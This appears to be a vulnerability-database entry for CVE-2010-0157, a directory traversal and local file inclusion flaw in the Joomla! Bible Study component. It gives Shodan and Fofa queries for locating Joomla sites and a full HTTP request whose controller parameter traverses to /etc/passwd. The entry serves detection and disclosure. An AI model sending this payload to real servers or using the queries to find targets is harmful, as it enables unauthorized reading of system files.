🔙 목록으로 돌아가기

CVE-2010-0157: Joomla! Component com_biblestudy - Local File Inclusion

TitleJoomla! Component com_biblestudy - Local File Inclusion
Authordaffainfo
SeverityHigh
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
RemediationUpgrade to the latest version to mitigate this vulnerability.
CVSS Score7.5
EPSS Score0.06394
CVE IDCVE-2010-0157
CWE IDCWE-22
Shodan Queryhttp.html:"joomla! - open source content management"http.component:"joomla"cpe:"cpe:2.3:a:joomla:joomla\!"
Fofa Querybody="joomla! - open source content management"
Tags cve2010 cve joomla lfi edb packetstorm vuln

🔍 Vulnerability Description

A directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.

🌐 HTTP Request

GET /index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/3.6.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2010/CVE-2010-0157.yaml

🦈 Packet Capture: ⬇️ Download cve-2010-0157.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A